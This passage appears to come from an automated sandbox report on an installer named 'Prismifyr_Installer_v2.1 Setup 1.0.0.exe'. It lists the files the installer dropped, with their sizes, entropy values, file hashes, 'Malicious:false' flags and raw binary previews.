                                                                                                                                                                                                                        SSDEEP:98304:5sbPUQUHoQ5dKV0H4HrX7OBAK2dMNFR7VxVXC3OTv+:5sbP/UHoQ5AV++wAlMlVXmOK
                                                                                                                                                                                                                        MD5:EBFBBD4F4887CADD1C135F4CA714E00F
                                                                                                                                                                                                                        SHA1:C37FC4A0F627D5346561EB29C556A54A050C8D95
                                                                                                                                                                                                                        SHA-256:FCE6894831D945EC7CA141290DD5B57375D83621B8EDF13BA02B14CADCEE6C29
                                                                                                                                                                                                                        SHA-512:EC15F8700330994B95C7F0961ECCBB8CD8401AF3051448375347A2E75352F1D9034A1C68E5B9AAB887D07360E38FC301F256B466DCC83377451F171320440B13
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........." ......c...........T...................................................`A........................................].w.......w.d.............|.\J...................v.......................v.(.....c.@.............x.......w.@....................text.....c.......c................. ..`.rdata........c.......c.............@..@.data.........x.......x.............@....pdata..\J....|..L...F|.............@..@.gxfg....-...@........~.............@..@.retplne.....p........~..................tls....B.............~.............@..._RDATA................~.............@..@.rsrc.................~.............@..@.reloc................~.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):521292
                                                                                                                                                                                                                        Entropy (8bit):5.4150086042392775
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:qFoe2+o3LDVy4VGmxu/PS+H2JynCa5eIRVho0vMI5gX2FT+FXZ22h+2pslVtn5g5:qFu+o7DU4Vj8/PS+H2JynCa5eIRVho0m
                                                                                                                                                                                                                        MD5:CCAFB2B77E0A8C7904819F4A9F699F6C
                                                                                                                                                                                                                        SHA1:309989062312FAC042770035240D57D8C0E237B8
                                                                                                                                                                                                                        SHA-256:F8FC117DD58DDA4A34B26D82F79A9ABA6008B01308581355444604A878A941BB
                                                                                                                                                                                                                        SHA-512:DEE9BB367A210A12B93A67C4D4C934E286A5D4D06FC5B58C23206C4A584A6B5F414AFF47C9F78307CB96D346B2CFE189F8831391EF7344AD73FA986B95550DD0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.....j.(...k.7...l.B...n.J...o.O...p.\...q.b...r.n...s.....t.....v.....w.....y.<...z.j...|.....}...................................................................$.....1.....@.....Q.....d...........O.......................q.................,.......................[.......................T......................./.....}.................#.....q.................2.......................>.......................:.......................E.......................v...........(.....?.............................S.............................N.....m.....v...........*.....Z.....i............ ....P ....` ..... ..... ...."!....+!....|!.....!.....!.....!....E"....."....."....."....?#.....#.....#.....$...._$.....$.....$.....$....?%.....%.....%.....%.....&....c&.....&.....&.....'....k'.....'.....'....8(....v(.....(.....(.....)....W).....).....).....*....O*.....*.....*....1+.....+.....+.....,.....,.....,....)-....K-.....-..........C.....V................../...../....s/...../...../
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):842504
                                                                                                                                                                                                                        Entropy (8bit):4.898655400857648
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:EaqKTorJhTCQIymrxn7Kxjkexpz205C2gMRsVGq+XG/6Kx/Ppp:65k
                                                                                                                                                                                                                        MD5:4CCAF97AFC2714724A32E9CD0F528A42
                                                                                                                                                                                                                        SHA1:7A74B02296CC237885D96179F4F81B65D8538299
                                                                                                                                                                                                                        SHA-256:F5FF8BCFFD6222D96BB2C180BEA945D9E7F90FE3B4D2123EB3FB6A298F8FC61E
                                                                                                                                                                                                                        SHA-512:F3990073B9F6A3662265BB5F39B942B06913FB3A6A99E3416D1099CC9DE4089C9A98209C5E2F633D7EEF984C7BE155CD9624AFC2FA2B0F3A4B735490CE743B84
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.$...h.,...i.7...j.C...k.R...l.]...n.e...o.j...p.w...q.}...r.....s.....t.....v.....w.0...y.W...z.....|.....}...............................#.....*.....1.....8.....9.....:.....?.....[.....q.......................r...........,.......................H.................e...........W...........b...................................e...........*.....@...........b.......................p......................." ....u ..... ....@!.....!....."....S".....".....#.....#.....$.....$.....%....+&....Z&.....&..../'....U'.....'.....'....`(.....(.....(.....).....).....).....).....*.....+.....+.....+....R,.....,....B-....X-.....-....u.................q/...../....C0....b0.....0....f1.....1.....1....r2.... 3.....3.....3....B4.....4.....4.....5.....5.....6....H6....p6.....7....u7.....7.....7.....8.....9....t9.....9....<:.....:.....:.....:.....;.....<....d<.....<....>=.....=.... >....I>.....?.....?....f@.....@....KA.....A....`B.....B....^C.....D....rD.....D.....D....XE....~E.....E....JF.....F....HG
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):923034
                                                                                                                                                                                                                        Entropy (8bit):4.9271696153543285
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:BjwXEBFE/T/RKOEZrpvPUoIm+kuESJ5TNphQ/fitCj:XU5tQh
                                                                                                                                                                                                                        MD5:E51D37F3FAD595E994047CD1BD341A5A
                                                                                                                                                                                                                        SHA1:4326804E59A5E9DCD10BBCEF8CC1F33AC82FFC31
                                                                                                                                                                                                                        SHA-256:79E4BB5E4E371414ED7986CFEC6523FFA68D2BBB5122C2C645085E7F8F804EB5
                                                                                                                                                                                                                        SHA-512:96D440F7F84EAA3FA3409333EEB7CE8DFC3A1C9A9D47A9604A596D98DB28827254837A2A208D8C281354575F78CAA6F984804E85A9120B3FE699124236DDA64F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.2...t.I...v.~...w.....y.....z.....|.&...}.W.............................................................................&.....X.....L...../.......................,.................T...........y...........K...........X...................................w.................5...........m.......................h............................., ....] ..... .....!.....!....."....."....x#.....#.....$.....%.....%.....&.....&....|'.....'.....(....e(.....(....N).....).....).....*.....*.....*.....+.....+....f,.....,.....,....t-.....-....8.....I............/...../...../....}0.....1....A1....X1.....1....c2.....2.....2....R3.....3....T4....q4.....4....p5.....5.....5....W6.....6.....6.....7....X8.....8.....8....a9.....9....+:....m:.....:....E;....h;.....;....&<.....<.....<.....=.....=.....>....W>....p>....x?....Y@.....A....:A.....A....yB.....B.....C.....C.....D....QD....hD.....D....1E....WE....kE....+F.....F....2G....TG.....G
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):961131
                                                                                                                                                                                                                        Entropy (8bit):4.667169963270736
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:LqD0A6CqrOJLYazQkEC/UTVbAUkp373ZS73AAKUyVDxzR4umpfd2Wd5pbuFZojQB:+v6CqrOJLYn+UTVbAUkp373ZQ3AgyVDh
                                                                                                                                                                                                                        MD5:B23E1D286B4332102DDED607E667C71E
                                                                                                                                                                                                                        SHA1:E343FACD16BD504714FE102949A3CC06C92D982B
                                                                                                                                                                                                                        SHA-256:BD277988128FEC0642D5FB2D922FB6D8DCA33EABE2546CDBEEF7006EC8B0757A
                                                                                                                                                                                                                        SHA-512:9037089867A0D99F60A458F61EF4E45D00482F9F0558F908FAC6E3C8FDF80FA5029DE433CF89DD7F55671FDC6E4C8E8742CF9C53D2F4E40B5EA48347A8F8C3DF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.$...j.0...k.?...l.J...n.R...o.W...p.d...q.j...r.v...s.....t.....v.....w.....y.D...z.r...|.....}.................................................%.....&.....'.....,.....N.....g.............................&.....W.................;.....e...........r...........\.....R.......................t...........H.....n...............................................d.....` ...."!.....!.....!.....".....#....$$....Z$...."%.....%....7&....a&....M'.....(.....(.....(.....).....*....P+.....+....E,.....,.....-....+-.....-....^.................|/.....0....L0....r0....)1.....1.....2....G2.....2....p3.....3.....3....n4.....4....25....R5.....5....c6.....6.....6....p7.....7....L8....t8....o9....U:.....:..../;.....;....`<.....<.....<....a=.....=....!>....i>....E?.....?....`@.....@.....A....5B.....B.....C.....C....PD.....D.....D.....E....*F.....F.....F.....G....:H.....H.....H.....I.....J....ZK.....K.....L....9M.....M.....N.....N....fO.....O.....O.....P...."Q....mQ.....Q.....R....fS.....S
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1239850
                                                                                                                                                                                                                        Entropy (8bit):4.281731110292573
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:nv35NhwKwc/XeYvFCkS32e/RT+amfmB0xyoYy3wFm7BbYzIh+5NBrqL:v7hw9c/uYvcvhoYSwFm7BbM57qL
                                                                                                                                                                                                                        MD5:4BE5823C75FCC1C1156A0C8813CCECE8
                                                                                                                                                                                                                        SHA1:123F94F742F5CC20E9DA173A611A5F0052253469
                                                                                                                                                                                                                        SHA-256:21B1AB4BEAB7B420234B18C41FA48D6CE4BF26D5DA89E8B235D6E56F74FC2E2D
                                                                                                                                                                                                                        SHA-512:FB3263004A4DAC70C1D03BE6A9AB984D7D04889B5614A1CCF655F3A76961698DAB6DFF1C059BB6832487530472BE29771E01AE8CC665A19AAE4B0F6913B56683
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.....j.....k.....l.)...n.1...o.7...p.D...q.J...r.V...s.....t.....v.....w.....y.$...z.R...|.y...}...............................................................................6.....[.....................................................E.......................`.....................................................T.......................1.....X ....6!.....!...."".....#.....#....d$.....$.....%.....&.....'....7'.....(.....(.....)....K)....F*....0+.....+.....+.....-................./...../....q0.....0.....0.....1...."2....f2.....2....!3.....3.....3.....4.....4.....5.....6....@6.....6.....7.....7....&8.....8.....9.....9.....9.....:....?;.....;.....;....^<.....=....R=....x=.....>.....?.....@.....@.....A.....B.....C....WC.....C....yD.....D.....D.....E....oF.....F.....G.....G.....H....dI.....I.....J....)K....uK.....K.....L....;M.....M.....M.....N.....O....)P....bP.....Q.....R.....S.....T....FU....HV.....V....RW....4X.....X....]Y.....Y....cZ....*[.....[.....[.....\.....]
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):585477
                                                                                                                                                                                                                        Entropy (8bit):5.408287949418745
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:HHUTPoa7D1DeCie2O3R45PqFuN3Mw2juwHzejm0t3lAkbKTenjRxwOwjcXR2lxQc:UY47SR57hhMNU62B56AUa+
                                                                                                                                                                                                                        MD5:FF3AE427DE1581CA390B0B1F36F39F7D
                                                                                                                                                                                                                        SHA1:9F03512629C5042EF5A52E1A20F08CE5EFA351AA
                                                                                                                                                                                                                        SHA-256:3D98926176EA7E250BA58E304A3498D859CF66B9A123498F177300A109F2CF07
                                                                                                                                                                                                                        SHA-512:C6B458415AD16CBE3C3463DEB32CA0A1039447E4E170A37581D0945F2CEF07068DD37BCC45DF49A5507D26FBE2DC26988F7EC50EB7A26F3C0691602440238FF2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.....j.....k.)...l.4...n.<...o.A...p.N...q.T...r.`...s.....t.....v.....w.....y.....z.\...|.....}.........................................................................-.....F.....f...........&...........".....?.................[.....t.............................u.................$.....~.......................s...................................:.....h...........Z.................5.......................Q.......................k.................4...........T.................;.......................' ....q ..... ..... .....!....V!.....!.....!....."....d".....".....".....#....j#.....#.....#.....$....P$....{$.....$.....$....%%....Q%....^%.....%.....&....I&....Z&.....&....L'.....'.....'.....(....d(.....(.....(.....)....T)....w).....)....$*....[*....p*.....*....V+.....+.....+....3,....z,.....,.....,.....-....f-.....-.....-.... .....k.................j/...../....d0.....0.....1....k1.....1.....1....Q2.....2.....2.....2....H3.....3.....3.....3....A4.....4.....4.....5
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):603449
                                                                                                                                                                                                                        Entropy (8bit):5.84173877986545
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:83udwrsAbJG1v6JPyUTNIAsZSmAcNO5c0CjAh/NOKbJSBf48Q0:8QdS7RIAsMx5c0CjAh/NOeJST
                                                                                                                                                                                                                        MD5:57655C2478BB63B95D13FFC90EF06F75
                                                                                                                                                                                                                        SHA1:671444C30C1993A5EEF87A6386B3D53BED67C772
                                                                                                                                                                                                                        SHA-256:5D97EC3BC8A4DCEDC7F3003BE4AE81F9451A323977469647AD6D499DA1A93DA1
                                                                                                                                                                                                                        SHA-512:F911CF439BAC97F0B547B7BA37A3CB0E624D3D74D54BBB596D77E072FC47DA4131E60F8C916AE744FFB75683263BCB9D7C9998BE519BBCCB2570C53123002004
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.....j.....k.....l. ...n.(...o.-...p.:...q.@...r.L...s.{...t.....v.....w.....y.....z.H...|.o...}...............................................................................!.....3.....H...........r.................P.......................}...........U.....n...........S.......................i.......................X.......................h.................N.................?...........&....._.....w...........J.........................................N.................+.............................b.......................C ..... ..... ..... ....2!.....!.....!.....!....F"....."....."....."....A#.....#.....#.....#....6$.....$.....$.....$....N%.....%.....%.....&....z&.....&....='....T'.....'.....'.....(.....(....e(.....(.....(.....(....k).....).....).....*....q*.....*....&+....]+.....+.....,.....,....2,.....,.....-....E-....Z-.....-....4.....u............/....{/...../...../....Y0.....0....*1....K1.....1.....2....X2....m2.....2....#3....H3....\3.....3....64....p4
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):546500
                                                                                                                                                                                                                        Entropy (8bit):5.454156507277653
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:OBawkwFfzzVm05uE7ZY1seSjUwlQO/JwcgobwpPaHwn5N/6UdKHzjd42Fxw8:4awkwR7djwbv5N/NdSn
                                                                                                                                                                                                                        MD5:8C9DA17F5FB04C4AD8393F5FB33F556B
                                                                                                                                                                                                                        SHA1:F99197310E0EA4DCDFB2145F903C80C044074E0B
                                                                                                                                                                                                                        SHA-256:B26270AE9BF298C18002803F97877FED40E5F2EDD17B9F7865E325DF99E6A858
                                                                                                                                                                                                                        SHA-512:E2B5CA200FDA7D54CD3F40BC4A36B57D7D0DFD7CE5709E238CAF14863F3B630A71F243C0A6686762A785D6105E0A5EBD3AF766F427920E9660C92426878043D3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.$...i.5...j.A...k.P...l.[...n.c...o.h...p.u...q.{...r.....s.....t.....v.....w.....y.U...z.....|.....}...............................!.....(...../.....6.....7.....8.....:.....H.....X.....l.................j.................+.......................v...........K.....g...........7.....g.....{...........*.....Q.....^.................<.....J.................B.....\...........H.........................................8.......................v...........J.....d...........}.................K.......................2........................ ....d ..... ..... ..... ....\!.....!.....!.....!....a"....."....."....."....U#.....#.....#.....#....4$....Z$....d$.....$.....%....J%....X%.....%....S&.....&.....&.....'....i'.....'.....'.....'....F(....d(....|(.....(....#)....@)....P).....)....8*....r*.....*.....+....a+.....+.....+.....,....l,.....,.....,.... -....^-.....-.....-............................{/...../....)0....X0.....0....$1....T1....f1.....1.....1.....2....'2.....2.....2.... 3
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):582999
                                                                                                                                                                                                                        Entropy (8bit):5.506897107247955
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:GwqiLKbV0Y5r3K7Up26YwgsaKa6mzdyO9BdTgAKOzct5IjO63BMpUhPMlIsCx3:lKhr3K7UpPgsavbHYt5y/MpU/sCx3
                                                                                                                                                                                                                        MD5:9E9266C10621B47A4FAB46867652EC7B
                                                                                                                                                                                                                        SHA1:0CE58349C662F4529991034EA2F8423CB79F1946
                                                                                                                                                                                                                        SHA-256:8370E7BE11AB27D7800CD33B10D8964148C44E1D34CF2CBE117539AC09F67797
                                                                                                                                                                                                                        SHA-512:E6BED71C09DE43696D807E6A7025BC2D7E6B6FA822AB09AED1D546E9486FB41FD910C11F2D9E621FFD1A2BF55FB6F2D7749B09035B431F0A9D7A9C3A85CDC435
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:........J'..e.....h."...i.3...j.?...k.N...l.Y...n.a...o.f...p.s...q.y...r.....s.....t.....v.....w.,...y.S...z.....|.....}.....................................&.....-.....4.....5.....6.....8.....I.....\.....n...........>...........V.....k...........n.................K...................................K.....c...........N.....|.................w.................F.............................3.....o...................................[................./...........[.................i...........].....|...........[ ....} ..... ..... ....j!.....!.....!....."....|"....."....."....=#.....#.....$.....$.....$.....%....C%....S%.....%....:&....m&....~&.....&....c'.....'.....'.....(.....(.....(.....(....v).....*....c*....y*.....*....V+....x+.....+.....+....B,...._,....r,.....,....E-....n-.....-......................./....k/...../...../.....0....}0.....0.....1....,1.....1....#2....d2....z2.....2.....3.....3.....3....u4.....4....55....b5.....5....K6....x6.....6.....6....a7.....7.....7.....8.....8.....8
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1053099
                                                                                                                                                                                                                        Entropy (8bit):4.7540777554166915
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:B6GHcaFbu4FiYX9m3MDlrJXDsSlmiH63D2NpUyEjHm1mVT8y2IWYNQKlCt2rDQu8:lHcaFbu4FiYX9m3MDlrJXDsSlmiHaD2t
                                                                                                                                                                                                                        MD5:1E5B1F817A9E7EE8D9BB9A472265AFF0
                                                                                                                                                                                                                        SHA1:D6743BC13EBB260913AF30D79CF78AD3B1DEDE5C
                                                                                                                                                                                                                        SHA-256:65F49119FC3CE3F159BA3196FB93F27B2966CEC2FFC5EAD833B8791F0FE5A638
                                                                                                                                                                                                                        SHA-512:BAD4A15C04665191B1922A470949448EBB5AF5DE215A93F71A2E1E10A2F35DDB6A0D2B5C6659ADED59009EC2FF1BF7509D30652B00D43287F9CD1F0E6BEAE482
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.....j.....k.....l.*...n.2...o.7...p.D...q.J...r.V...s.....t.....v.....w.....y.$...z.R...|.y...}.........................................................................0.....U..................................................... .....V.....^.....2.................3...........H...........E...........+.....L................................................ .....!.....".....".....".....#....v$.....$.....%.....%.....&....)'....T'....E(.....).....).....).....*.....+.....,.....,.....-....1.....}...........T/.....0....J0....o0.....1.....1.....2....>2.....3.....3...._4.....4....S5.....6.....6.....6....{7....Q8.....8.....8.....9....[:.....:.....:.....;....S<.....<.....<.....=.....>....y?.....?....~@....FA.....A.....A.....B.....C....>C....ZC.....D.....D.....E....2E.....F.....F....[G.....G....XH.....I....>I....eI....0J.....J....PK.....K....mL.....M.....M.....M.....O.....P.....P.....Q.....R.....R....fS.....S.....T.....U....9V....jV....%W.....W....YX....{X.....Y....|Z.....[
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):474921
                                                                                                                                                                                                                        Entropy (8bit):5.523032100005657
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:e/BeweES7Ve7aiAUwzqNMP9eqQ3K8faYmfcmk59MxhBcRRpVA:IetJuAiNMtQ3KB+5ux8A
                                                                                                                                                                                                                        MD5:F65ACB944CE633180762095EC6A48E31
                                                                                                                                                                                                                        SHA1:BA5CC1FA02A1C6055F5A6BEBE1AEB993E3844590
                                                                                                                                                                                                                        SHA-256:87E534F1D0A4B32BD9AE207E167F87499BDF1E05C5A7C173FC3AACFDCB0073D8
                                                                                                                                                                                                                        SHA-512:11655EEEDD381C2629C34C72A106DA1130DFBE6D50E7C8D32A29FEB5C4C677A3606B4615F904E029C1703D6745FA61B959E50E928022F596AEEA29BF2D2A65E4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:........1(,.e.....h.....i.....j.....k.....l.$...n.,...o.1...p.>...q.D...r.P...s.....t.....v.....w.....y.....z.L...|.s...}...............................................................................".....2.....C.................a.....u.................J.....Z.................V.....l.................@.....U.............................g.......................0.....u.......................h.......................V.......................,.....W.....g.................'.....2.................=.....Q............................./.....j.............................3.....?.......................,.....z.......................E........................ ....J ....r ....} ..... .....!....4!....?!.....!.....!....5"....J".....".....".....".....#....Z#.....#.....#.....#.....$....Z$....{$.....$.....$.....%....c%.....%.....%.....&.... &..../&.....&.....&.....'.....'....|'.....'.....'.....(....w(.....(....')....5).....).....)....,*....I*.....*.....*.....+....&+....m+.....+.....+.....+....<,.....,.....,
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):479208
                                                                                                                                                                                                                        Entropy (8bit):5.51691143890259
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:5sNJk9kFTDBop3rfxEKF8HWMP9epQBDRfaYNr2B55Mxwngpt/hLFwB:AobfxElWMaQBDBm5qx/FwB
                                                                                                                                                                                                                        MD5:0EA050358326E9BA2FD06751A7B2BAD2
                                                                                                                                                                                                                        SHA1:3610B9D4C370AF456BF8D1447417BA5194FB6A85
                                                                                                                                                                                                                        SHA-256:55FD1B71A47B6D4A81240240FD24E12C3DD7B986924ECC11AFD7D21E7717A49F
                                                                                                                                                                                                                        SHA-512:D10D047BE9629608F89AFBBC115ECE521AF4EA1A7529832943B67441BFF2FCD698FEEFE6DF6296C306B399C55ACF84DFA0734447F5F64063F2E1ECEBBBC8EDF3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:........s(..e.l...h.t...i.|...j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.I...w.u...y.....z.....|.....}.".....K.....P.....X.....`.....h.....o.....v.....}.....~.........................................3.......................K.......................@.......................C.............................c.......................&.....M.....Z.......................(.......................(.....|.......................X.......................&.....n.......................n.......................:.....U.....d.............................H.............................Z.......................6.....c.....o.................& ....1 ....y ..... ..... ..... ....9!....~!.....!.....!....."....m".....".....".....#....M#....p#.....#.....#.....$....,$....A$.....$.....$.....$.....%....`%.....%.....%.....&....G&....~&.....&.....&.....'....G'....q'.....'.....'....&(....^(....v(.....(....G).....).....).....*....Z*.....*.....*.....+....P+....|+.....+.....+.....,....2,....B,.....,.....,.....-
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):576469
                                                                                                                                                                                                                        Entropy (8bit):5.377558940141367
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:TeTY0pDeoFnObDRpDYBcO5oi1A5za6aQ+lR51m:V04DprOE5zaI+7m
                                                                                                                                                                                                                        MD5:B69C517BCC9DCACD327B8601A1AD85FB
                                                                                                                                                                                                                        SHA1:0065BEAFE7E12673010FE1009729BAF507565E05
                                                                                                                                                                                                                        SHA-256:F86E76BDA0DE5749F30EB7C4EDA26D4F4DAF7EA307AC4785CAD33836E45535E9
                                                                                                                                                                                                                        SHA-512:F4B2FB7F1D728351A7E98FB888DBDD560D84E6471D50EE700F443F549D958FA059BE961D0A7E66DE56057699B5C674DFC03996DA55B09C48635D26F437F9E338
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h. ...i.)...j.5...k.D...l.O...n.W...o.\...p.i...q.o...r.{...s.....t.....v.....w."...y.I...z.w...|.....}...........................................#.....*.....+.....,...........@.....O.....d.....{.....%...................................K.....c...........s.................j...........!.....<.............................|...................................R.................x.................Z...................................1.....H...........4.....|.........../.......................................... ....e ..... ..... ..... ....\!.....!.....!....."....v"....."....'#....:#.....#.....#....<$....H$.....$.....$....%%....0%.....%.....%.....&.....&....z&.....&....!'....1'.....'....$(....p(.....(.....(....K)....z).....).....*....M*....t*.....*....>+....t+.....+.....,....y,.....,.....-....i-.....-.....-.....-...._................../...../...../.....0....80.....0....M1.....1.....1....X2.....2.....3....E3.....3....+4....o4.....4.....4.....5....?5....R5.....5....C6.....6.....6
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):576160
                                                                                                                                                                                                                        Entropy (8bit):5.356812304124685
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:DNvbzJTpoaO30I1Fl0fEgRNkpT+KeuiR5R9njm5JLf2Q9g/N6PZauu:JXOb0Fqp6uiRpnjm5Z2oghv
                                                                                                                                                                                                                        MD5:B1000587C94D009694135741E20106AE
                                                                                                                                                                                                                        SHA1:DC41998D69DA17BFAC9A79696D4D325F43259FC9
                                                                                                                                                                                                                        SHA-256:54F6ECDB50ED0154E54B367BE15CBD946CE41BDBF687FEB23AB2B27E41FF0800
                                                                                                                                                                                                                        SHA-512:BD2072457DA202F4876981EBB08228EA302D7CB8B628B6BDFDE22DA0F6D278668BAEE95FA71F78CA8B0FAFF38D88FAD6474F2AA5F5394597BD4556ED02011A09
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.&...i.....j.:...k.I...l.T...n.\...o.a...p.n...q.t...r.....s.....t.....v.....w.'...y.N...z.|...|.....}.....................................!.....(...../.....0.....1.....3.....F.....V.....k.............................6.................^.....t.........................................-.....H.................2.....B.................,.....=...........7.....|...........+.......................o...................................:.....O...........C.................;.................$.................. ...." ....x ..... ..... .....!....j!.....!.....!.....".....".....".....#....&#.....#.....#.....$.....$....o$.....$.....$.....%....V%.....%.....%.....%....M&.....&.....&.....&....\'.....'.....(....2(.....(.....(.....)....1).....).....).....*....(*.....*.....+....4+....G+.....+....<,.....,.....,....!-....m-.....-.....-..........k.................+/....{/...../...../....q0.....0....U1....l1.....1....y2.....2.....2....k3.....3.....4....)4....{4.....4.....4.....5....p5.....5.....6
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):523890
                                                                                                                                                                                                                        Entropy (8bit):5.460274187404278
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:8OunMp9UWdUs9/8uq+p9fUL40tmFooSPT88trPSikntfLH5oM2CjiCKMxacfJPQc:5uMpRmG/PhQmFoX4fLH5oMYW
                                                                                                                                                                                                                        MD5:7B2A22B5AFA14CCAD4AA68B9A17189CE
                                                                                                                                                                                                                        SHA1:F673AACA9BC560656A5B737A9892BCD9344C3720
                                                                                                                                                                                                                        SHA-256:30AE79D4435826E590750C8895E150ECAF3F8CC96EC70139C499CE0A0AE55D32
                                                                                                                                                                                                                        SHA-512:BD3598FF7C52AFE3EB501CE70A6C9F63532B12BE8D1A82565FF1494C2FF6FA2438A6E3E33D00FA1E716325F8B859AF81AFE269AE3D1861317BA5B8E40538174E
                                                                                                                                                                                                                        Malicious:false
